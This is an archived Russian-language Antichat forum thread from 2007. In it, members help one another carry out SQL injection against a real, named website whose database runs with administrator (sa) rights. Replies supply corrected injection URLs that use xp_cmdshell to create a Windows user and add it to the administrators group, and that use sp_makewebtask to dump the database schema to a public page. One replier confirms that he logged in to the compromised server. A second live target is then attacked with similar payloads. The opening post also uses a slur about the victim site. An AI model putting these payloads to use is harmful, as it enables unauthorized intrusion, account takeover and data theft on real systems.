ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
mssql inj вопрос для гуру |
24.07.2007, 23:56
|
|
Новичок
Регистрация: 12.04.2006
Сообщений: 22
Провел на форуме:
90532
Репутация:
3
|
|
mssql inj вопрос для гуру
Здравствуйте помогите понять почему неработают некоторые фишки mssql
для примера взял инъекцию на сайте пидоров 
http://cybersocket.com/current/current.cfm?issue_id=-1'
тут sql-inj с правами sa
http://cybersocket.com/current/current.cfm?issue_id=system_user
Syntax error converting the nvarchar value 'sa' to a column of data type int.
хочу добавить юзера через xp_cmdshell
http://cybersocket.com/current/current.cfm?issue_id=1;exec%20master..xp_cmdshell% 20'net%20user%20test1%20hacker%20/add';--
http://cybersocket.com/current/current.cfm?issue_id=1;exec%20master..xp_cmdshell% 20'net%20localgroup%20administrators%20test1%20/add';--
выдаёт Incorrect syntax near 'net'.
что я делаю неправильно в этом случае? xp_cmdshell вроде неотключён и должно всё сработать а недобавляет юзера  коннекчусь к серваку через удалённый рабочий стол и говорит логин пасс неверный
пробую зделать дамп таблиц через sp_makewebtask
http://cybersocket.com/current/current.cfm?issue_id=1;%20EXEC%20master..sp_makewe btask%20%22C:\Inetpub\wwwroot\www.cybersocket.com\ includes\output.html%22,%22SELECT%20*%20FROM%20%20 %20%20INFORMATION_SCHEMA.TABLES%22;--
тоже неполучается,пробовал и в расшаренную папку на удалённом сервере и тоже облом
Incorrect syntax near the keyword 'order'.
тут что я нетак делаю?
путьдо веб директории в ошибке взял
Error Executing Database Query.
[Macromedia][SQLServer JDBC Driver][SQLServer]Incorrect syntax near the keyword 'order'.
The error occurred in C:\Inetpub\wwwroot\www.cybersocket.com\includes\qr y_get_article_id.cfm: line 17
Called from C:\Inetpub\wwwroot\www.cybersocket.com\current\cur rent.cfm: line 1
Called from C:\Inetpub\wwwroot\www.cybersocket.com\includes\qr y_get_article_id.cfm: line 17
Called from C:\Inetpub\wwwroot\www.cybersocket.com\current\cur rent.cfm: line 1
P.S. как узнавать таблицы и колонки+инфу в них я знаю и как сливать построчно тоже,меня интересуют способы именно через xp_cmdshell , sp_makewebtask и другие примочки mssql когда есть права sa |
|
|
25.07.2007, 00:55
|
|
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
Провел на форуме:
3372120
Репутация:
2565
|
|
тоже неполучается,пробовал и в расшаренную папку на удалённом сервере и тоже облом
Incorrect syntax near the keyword 'order'.
тут что я нетак делаю?
Тебе ошибка в явном виде вываливается, надо лишь немного подумать (заглушить ордер):
Код:
http://cybersocket.com/current/current.cfm?issue_id=1;+EXEC+master..sp_makewebtask+%22C:\Inetpub\wwwroot\www.cybersocket.com\includes\output.html%22,%22SELECT+*+FROM+INFORMATION_SCHEMA.TABLES%22;+select+c.id,c.category+from+tbl_issue_category+ic,tbl_category+c,tbl_article+a+where+ic.category=a.category+and+ic.issue=a.issue+and+ic.category=c.id+and+ic.issue=1
Здесь все таблицы
http://cybersocket.com/includes/output.html
а здесь можешь посмотреть все колонки
http://cybersocket.com/includes/output5.html
ЗЫ
Юзверя создавать не буду, надеюсь сам дальше разберешься, а то совсем непохек получится =\
ЗЗЫ
Ток там при добалении юзверя не забудь вместо ' поставить "(%22)
Последний раз редактировалось [53x]Shadow; 25.07.2007 в 01:00..
|
|
|
|
25.07.2007, 01:44
|
|
Новичок
Регистрация: 12.04.2006
Сообщений: 22
Провел на форуме:
90532
Репутация:
3
|
|
спасибо большое,как бы с тобой пообщаться в icq ? время много неотнему и глупыми вопросами доставать небуду...напиши в пм свою асю плз
|
|
|
|
25.07.2007, 02:09
|
|
Новичок
Регистрация: 12.04.2006
Сообщений: 22
Провел на форуме:
90532
Репутация:
3
|
|
с юзером пробовал и так как ты написал(до создания тут темы ещё),неработает почему-то...может у меня руки неоттуда ростут) ну нетолько с этой багой такие проблемы
|
|
|
|
25.07.2007, 02:54
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
Сообщение от $jason$
с юзером пробовал и так как ты написал(до создания тут темы ещё),неработает почему-то...может у меня руки неоттуда ростут) ну нетолько с этой багой такие проблемы
ну тебе же сказали надо order by нетрализовать
Код:
http://cybersocket.com/current/current.cfm?issue_id=1;exec%20master..xp_cmdshell%20%22net%20user%20test1%20hacker%20/add%22;select%20c.id,%20c.category%20from%20tbl_issue_category%20ic,%20tbl_category%20c,%20tbl_article%20a
Код:
http://cybersocket.com/current/current.cfm?issue_id=1;exec%20master..xp_cmdshell%20%22net%20localgroup%20administrators%20test1%20/add%22;select%20c.id,%20c.category%20from%20tbl_issue_category%20ic,%20tbl_category%20c,%20tbl_article%20a
зы пробовал приконнектится... все работает
__________________
Карфаген должен быть разрушен...
|
|
|
|
25.07.2007, 04:39
|
|
Новичок
Регистрация: 12.04.2006
Сообщений: 22
Провел на форуме:
90532
Репутация:
3
|
|
да всё ок!
чёто я тупанул немного,спасибо
|
|
|
|
25.07.2007, 14:36
|
|
Новичок
Регистрация: 12.04.2006
Сообщений: 22
Провел на форуме:
90532
Репутация:
3
|
|
нашёл ещё одну inj с правами sa там там возникает такая ошибка при подстановке -1'
Unclosed quotation mark after the character string '-1''. Incorrect syntax near '-1''.
site.com/index.asp?id=1;exec%20master..xp_cmdshell%20%20%22 net%20user%20test%20pass%20/add%20&%20net%20localgroup%20administrators%20test %20/add%22--
Conversion failed when converting the varchar value '1;exec master..xp_cmdshell "net user test pass /add ' to data type int.
site.com/index.asp?id=1';exec%20master..xp_cmdshell%20%20%2 2net%20user%20test%20pass%20/add%20&%20net%20localgroup%20administrators%20test %20/add%22--
Unclosed quotation mark after the character string 'net user test pass /add ''.
пытаюсь сам думать но недогоняю) подскажите плз
как я понял тут в одной переменной скрипта id передаются два запроса к базе и нужно правильно вставить свой запрос и второй запрос закрыть (может конечно я глупость сказал )
так ещё пробовал
site.com/bug.asp?ID=1';exec%20master..xp_cmdshell%20%20net% 20user%20test%20pass%20/add%20&%20net%20localgroup%20administrators%20test %20/add%22;1';--
Incorrect syntax near the keyword 'user'. Unclosed quotation mark after the character string ''.
непонял ещё
Conversion failed when converting the varchar value
что тут тип нужно чтоли указывать...подскажите тогда как это зделать? |
|
|
|
25.07.2007, 16:58
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
здесь: site.com/index.asp?id=1;exec.... после 1 попробуй поставь поставь ковычку
вот так попробуй:
Код:
site.com/index.asp?id=1';exec%20master..xp_cmdshell%20' net%20user%20test%20pass%20/add%20&%20net%20localgroup%20administrators%20test%20/add
__________________
Карфаген должен быть разрушен...
Последний раз редактировалось Scipio; 25.07.2007 в 17:02..
|
|
|
|
25.07.2007, 18:24
|
|
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
Провел на форуме:
3372120
Репутация:
2565
|
|
Вообще тему имхо пора закрывать, для скулей есть отдельная тема, туда и выкладывай, там тебе быстро помогут. А вообще больше становится похожим на просьбы о взломе =\
|
|
|
|
25.07.2007, 19:14
|
|
Новичок
Регистрация: 12.04.2006
Сообщений: 22
Провел на форуме:
90532
Репутация:
3
|
|
где отдельная тема по скулям дай линк
я не прошу чтоб мне кто-то что-то взламывал, я хочу сам понять почему у меня неполучается составить правильный запрос к базе прежде чем что-то спрашивать я сам пробую по всякому и инфу везде где только можно ищу по теме и потом только спрашиваю у вас
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [53x]Shadow](/avatars/avatar32248.jpg?420612){kind=avatar}
![Аватар для [53x]Shadow](/avatars/avatar32248.jpg?421161){kind=avatar}
Похожие темы
Линейный вид
